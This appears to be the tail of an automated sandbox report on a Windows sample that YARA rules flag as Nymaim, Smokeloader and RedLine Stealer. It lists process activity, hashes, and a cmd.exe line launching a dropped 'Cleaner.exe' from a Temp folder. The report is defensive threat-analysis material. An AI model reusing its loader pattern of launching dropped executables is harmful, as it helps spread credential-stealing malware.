                                                          Set-Cookie: clhf03028ja=102.129.143.15; expires=Tue, 03-Oct-2023 15:33:22 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                          Set-Cookie: 333625791719766799=1; expires=Tue, 03-Oct-2023 15:33:22 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                          Expires: Mon, 03 Oct 2022 15:33:22 +0000
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Strict-Transport-Security: max-age=31536000
                                                          X-Frame-Options: SAMEORIGIN
                                                          2022-10-03 15:33:22 UTC | 0 | IN | Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0

                                                          Target ID:0
                                                          Start time:17:31:59
                                                          Start date:03/10/2022
                                                          Path:C:\Users\user\Desktop\file.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\file.exe
                                                          Imagebase:0x400000
                                                          File size:238080 bytes
                                                          MD5 hash:A3B774ED5023F56970EEA0668AE65703
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.266126410.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.307807767.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.272012058.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.255218236.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.292406498.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.254552831.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.307333691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.285914510.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.300504834.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.306335009.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.286527423.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.265875582.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.254096635.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.293499241.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.299464336.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.260403586.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.270306154.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.271549614.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.261149123.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.261493549.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.270666653.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.260670257.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.293688181.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.265067890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.280355467.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.285114416.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.265318606.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.300281036.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.254941692.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.306082555.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.299699149.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.292621686.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.253262177.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          Target ID:2
                                                          Start time:17:32:04
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 528
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:4
                                                          Start time:17:32:07
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 700
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:6
                                                          Start time:17:32:09
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 732
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:8
                                                          Start time:17:32:12
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 744
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:13
                                                          Start time:17:32:19
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 776
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:20
                                                          Start time:17:32:22
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 900
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:24
                                                          Start time:17:32:25
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 964
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:27
                                                          Start time:17:32:29
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1152
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:30
                                                          Start time:17:32:50
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1280
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:31
                                                          Start time:17:32:53
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
                                                          Imagebase:0xb0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:32
                                                          Start time:17:32:55
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:33
                                                          Start time:17:32:55
                                                          Start date:03/10/2022
                                                          Path:C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe"
                                                          Imagebase:0x24b7b8b0000
                                                          File size:3947920 bytes
                                                          MD5 hash:04514BD4962F7D60679434E0EBE49184
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Target ID:39
                                                          Start time:17:33:24
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1272
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          No disassembly